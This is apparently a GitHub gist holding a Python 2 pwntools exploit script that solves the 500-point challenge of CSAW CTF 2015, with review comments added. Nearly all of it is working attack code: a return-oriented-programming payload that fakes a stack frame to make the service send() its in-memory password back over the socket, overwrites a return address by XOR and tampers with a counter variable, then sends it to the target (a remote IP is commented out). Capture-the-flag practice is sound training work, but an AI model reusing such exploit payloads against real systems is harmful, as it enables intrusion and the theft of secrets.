
@vanhoefm
Created September 21, 2015 02:24
Solution for exploiting 500 challenge of CSAW CTF 2015
#!/usr/bin/env python2
from pwn import *
# Builds one payload for the CTF service and sends it over TCP. The payload has
# two parts: a fake stack frame that calls send() on the in-memory password,
# followed by words that line up with the saved control data of the vulnerable
# function.
#
# NOTE(review): every address below is a hard-coded absolute value, so the
# script presumably relies on the target being loaded at a fixed base (no PIE)
# -- confirm against the binary. Statement order matters: several values are
# derived from len(payload) at the point where they are appended.
#
# Stack layout of vulnerable functions:
#
# [ buffer of some length ][canary][align1][align2][saved-ebp][return-addr][arg0-buffer][arg4-count]
#
payload = pack(0x08048740) # send function -> send(socket, &password, 0x100, 0)
# will call func_72, with buffer of 0x84 bytes
payload += pack(0) # next ROP chain
payload += pack(4) # socket file descriptor (hard-coded; assumes the connection is fd 4 in the target)
payload += pack(0x0805F0C0) # address of password
payload += pack(0x100) # length of password
payload += pack(0) # flags argument of the send call
# Zero-fill the rest of the 0x84-byte buffer. The "/" relies on Python 2 integer
# division (see the python2 shebang); under Python 3 it would yield a float.
payload += pack(0) * ((0x84-len(payload)) / 4) # padding so we can now overwrite variables
log.info("Constructed stack frame of 0x%x bytes" % len(payload))
# stack layout when entering function:
#
# [return-addr][buffer][size-read][???][???][???][???][bytes_read][buffer-data]
#
# 0xffffd63c: 0x08056afa 0xffffd65c 0x00000030 0x00000100
# 0xffffd64c: 0x00000000 0xf7ffda54 0x00000001 0x00000030
# 0xffffd65c: 0x08048740 0x00000000 0x00000004 0x0805F0C0
#
# NOTE(review): the words below appear to be combined with the existing stack
# contents by XOR rather than copied over them (the author's comment on the
# return-address word says so); if that holds, a zero word leaves the canary,
# alignment words and saved ebp unchanged -- confirm against the binary.
payload += pack(0) * 4 # skip canary, align, and saved-ebp
# 0x8056AFA matches the return address at the start of the dump above; XORing it
# with this word gives 0x80578F5.
payload += pack(0x8056AFA ^ 0x80578F5) # let XOR write address of ROP gadget "7-pop; ret"
payload += pack(0) # ignore buffer pointer
# len(payload) + 4 is the total payload length once this word has been appended.
payload += pack((len(payload) + 4 - 1) ^ 1) # overwrite counter variable for early stop
# Connects to a local instance of the service; the commented-out line names a
# remote host instead.
r = remote('localhost', 24242)
#r = remote('54.152.37.20', 24242)
log.info("Sending {} bytes payload: {}".format(len(payload), repr(payload)))
r.send(payload)
# Attach the terminal to the connection so the service's reply can be read.
r.interactive()